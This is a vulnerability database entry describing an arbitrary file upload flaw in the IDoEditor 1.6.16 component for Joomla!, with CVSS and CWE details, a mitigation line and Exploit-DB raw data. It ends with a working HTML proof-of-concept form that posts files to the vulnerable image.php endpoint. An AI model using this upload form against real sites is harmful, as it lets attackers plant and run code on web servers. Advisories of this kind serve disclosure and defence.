IDoEditor Component for Joomla! Arbitrary File Upload Vulnerability

vendor:

IDoEditor

by:

SecurityFocus

7,5

CVSS

HIGH

Arbitrary File Upload

434

CWE

Product Name: IDoEditor

Affected Version From: 1.6.16

Affected Version To: 1.6.16

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

IDoEditor Component for Joomla! Arbitrary File Upload Vulnerability

The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.

Mitigation:

Input validation should be used to ensure that only properly formed data is accepted.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/53973/info

The IDoEditor component for Joomla! is prone to a vulnerability that lets attackers upload arbitrary files because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process.

IDoEditor 1.6.16 is vulnerable; other versions may also be affected. 

<html>
<body>
<center>
<form
action="http://www.example.com/plugins/editors/idoeditor/themes/advanced/php/image.php"
method="post" enctype="multipart/form-data">
<input type="file" name="pfile">
<input type="submit" name="Submit" value="Upload">
</form>
</center>
</body>
</html>